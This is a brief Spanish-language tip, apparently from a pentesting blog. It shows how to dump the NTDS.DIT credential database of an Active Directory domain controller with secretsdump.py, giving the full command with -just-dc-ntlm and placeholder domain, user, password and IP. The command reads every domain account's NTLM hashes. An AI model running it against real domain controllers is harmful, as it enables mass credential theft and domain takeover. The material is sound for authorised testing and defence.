Extraer el contenido del archivo NTDS.DIT de un dominio

Para extraer el contenido del archivo NTDS.DIT de un controlador de dominio usamos el comando secretsdump.py de la siguiente forma.

secretsdump.py domain.local/user:’password’@192.168.0.1 -just-dc-ntlm

Sustituye «domain.local», «user» y «password» según sea el caso. 192.168.0.1 seria la IP del controlador de dominio.

Deja un comentario